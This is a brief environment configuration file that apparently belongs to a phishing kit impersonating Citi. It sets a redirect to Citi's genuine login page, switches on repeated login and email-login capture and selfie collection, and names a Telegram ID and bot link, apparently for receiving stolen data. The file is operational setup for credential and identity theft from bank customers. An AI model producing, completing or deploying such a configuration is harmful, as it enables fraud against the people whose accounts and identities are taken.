BANK_NAME=CITI
NEXT_PUBLIC_DOCS_PAGE=ON
NEXT_PUBLIC_EXIT_URL=https://www.citi.com/login
NEXT_PUBLIC_DOUBLE_LOGIN=ON
NEXT_PUBLIC_DOUBLE_EMAIL_LOGIN=ON
NEXT_PUBLIC_TAKE_SELFIE=ON
TELEGRAM_ID=1860996067
BOT_LINK=http://localhost:8080